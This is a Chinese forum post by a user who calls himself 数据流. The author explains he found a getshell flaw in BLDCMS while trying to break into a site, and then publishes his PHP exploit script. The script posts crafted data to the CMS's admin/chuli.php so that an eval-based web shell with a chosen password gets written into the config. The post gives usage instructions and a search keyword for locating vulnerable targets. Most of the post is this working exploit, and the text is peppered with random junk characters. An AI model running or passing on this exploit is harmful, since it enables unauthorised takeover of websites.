之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
3 p: a. B# p$ Y) h* ^6 P, m, r1 M2 p1 w7 g x& t
" ~) E0 b m& r" E
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 ( W' |6 Y5 D( o6 p/ a" V8 @( M' D
: H8 @* H5 V2 h5 A# ^4 P3 f
既然都有人发了 我就把我之前写好的EXP放出来吧4 V7 X* [; h+ b7 @
; B; Q% t' N4 S
view source print?01.php;">5 _' D9 ~9 O V7 ~9 x0 B
02.<!--?php
7 E# I" u0 A- p4 v$ o03.echo "-------------------------------------------------------------------5 k H$ \2 q' O( h" `, i$ q* g
04.
5 D9 c1 X# W! {! P7 O; q05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
( `8 @: ~( S& r/ b) k" D: f06. . B) h- ^- O3 a& z) K- N
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
" z. c) e! ]1 Z4 M08. 7 ?5 x7 g" |9 I( i' x/ x* S
09.QQ:981009941\r\n 2013.3.21\r\n $ W5 o1 y9 l6 e
10. 8 e4 x7 H( Z; H/ W1 R) e* u
11.
2 }: b2 P/ P# O4 z( g% |" d& d) O12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码2 P! Q! x) Q( e5 e B+ |) x/ z, z
13. 0 G% ~; ]7 ^! D8 y2 ~5 m$ K% J
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------% Q2 q( L3 D1 }7 S" r
15.
9 |' F# ]) Z) K; o r8 M# i$ q16.--------------------------------------------------------------------\r\n";; {5 [: h9 S. u
17.$url=$argv[1];1 k9 q7 Q# b/ G: b" _+ V
18.$dir=$argv[2];
) O3 G$ e. c' a19.$pass=$argv[3];
8 S# P( x) c/ F$ W2 }20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';. p) Q& J; t' v. O3 v: j8 _ A
21.if (emptyempty($pass)||emptyempty($url))
! J6 O+ C! r" f& a2 l22.{exit("请输入参数");}
5 m7 K: [! x {23.else, r* a; s5 x' G- Q" r2 j; m
24.{
9 l S" W0 P( y1 W25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
0 m" s6 Y+ M' _5 y) L26.
5 r4 F& r- d) h27.al;
# N" v8 N' h% k0 O# ?28.$length = strlen($fuckdata);
. X+ @9 I& C& e, [0 n29.function getshell($url,$pass)
( Q5 _0 o+ {" T6 i! g# C, X) s30.{8 n: ^' |8 ^: y7 J
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
" _ ~- G3 D0 D! `8 ^32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n"; C8 L& G% L% ?9 y3 [+ Y
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";4 {) r4 V L' b& Y, v
34.$header .= "User-Agent: MSIE\r\n";
% G+ i& J2 i& B" y+ G/ C& [4 f35.$header .= "Host:".$url."\r\n";
B4 S# u8 m% C+ p1 z$ L36.$header .= "Content-Length: ".$length."\r\n";
1 \( T6 I8 C% K: m' m37.$header .= "Connection: Close\r\n";
$ f+ T) A0 t; r w5 \* \" X38.$header .="\r\n";1 P8 I% f$ z( z( d0 K
39.$header .= $fuckdata."\r\n\r\n";
5 p. D& t# P; z: X, Z$ V40.$fp = fsockopen($url, 80,$errno,$errstr,15);
( [# q) q3 ?- h* e5 b6 m1 `, `4 ?41.if (!$fp)
+ b2 \+ |/ l4 N. @- |42.{
+ {+ D7 \' o( P: M$ @43.exit ("利用失败:请检查指定目标是否能正常打开");
0 X2 \( p" D8 T" z# p, U" g4 g44.}$ y/ X1 f Z9 @: _; i; z t: e0 b- @
45.else{ if (!fputs($fp,$header))
" B; N0 j3 y' Z: i9 I$ w* I6 M46.{exit ("利用失败");}
5 K% ], {( z$ Q7 M4 }+ C# Q47.else
: o4 d8 g+ {2 S: _) g2 z48.{
- P2 x9 T" V3 d) R8 o# m49.$receive = '';3 \* [ G+ b8 l, @2 }. X/ O- L
50.while (!feof($fp)) {! D2 d3 m+ {! j0 r! s. i2 j
51.$receive .= @fgets($fp, 1000);2 l0 \- h/ h [" X& p3 ?$ e
52.}
" D1 F3 W+ `/ _3 F: W53.@fclose($fp);: w+ M1 M& Y, A. c
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标7 t" m. F' J9 U: d$ Y5 F
55. " O; N# F( q' P" k0 Q- K5 S* q9 A
56.GPC是否=off)";' ]& z, w1 Z1 W; @: V+ l
57.}}3 a- i6 x+ w8 o
58.}' ]: q' R5 D* s+ A
59.}3 l' g" t- R6 p( A4 U
60.getshell($url,$pass);2 w. |% j4 t! h, Q
61.?-->
" Y4 s7 l7 F) H. i0 J- V 5 o" h0 p# @! x y9 |' Z
- J U ~% P5 e0 ?1 T/ t- A% w( t q
{, o% j& G1 W$ wby 数据流 r {) m8 U, u# a
|
发表于 2013-3-26 20:49:10
收藏
支持
反对